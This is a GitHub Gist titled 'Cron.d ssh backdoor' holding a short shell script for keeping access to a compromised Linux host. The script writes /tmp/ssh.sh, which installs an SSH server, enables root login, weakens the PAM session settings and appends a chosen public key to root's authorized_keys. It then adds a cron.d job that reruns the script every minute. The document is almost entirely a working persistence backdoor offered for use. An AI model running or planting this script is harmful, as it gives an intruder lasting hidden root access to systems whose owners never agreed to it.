Last active
September 12, 2024 12:06
-
-
Save grahamhelton/b78f9238544e63c0046b4a20e3aed188 to your computer and use it in GitHub Desktop.
Cron.d ssh backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Place our backdoor script into /tmp/ssh.sh | |
| # This will be ran by cron | |
| # Run one line at a time. Do not try to paste entire command in at once.... | |
| cat << EOF > /tmp/ssh.sh | |
| apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p /root/.ssh && touch /root/.ssh/authorized_keys ; echo "ENTER YOUR PUBLIC KEY HERE" >> /root/.ssh/authorized_keys ; /usr/sbin/service ssh restart | |
| # Then type EOF and press enter | |
| # Ensure the script has execute permissions | |
| chmod +x /tmp/ssh.sh | |
| # This will keep adding your SSH key | |
| # you could change >> to > but that will overwrite other keys in there. | |
| echo "* * * * * root cd /tmp && sh ssh.sh" >> /etc/cron.d/ssh |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment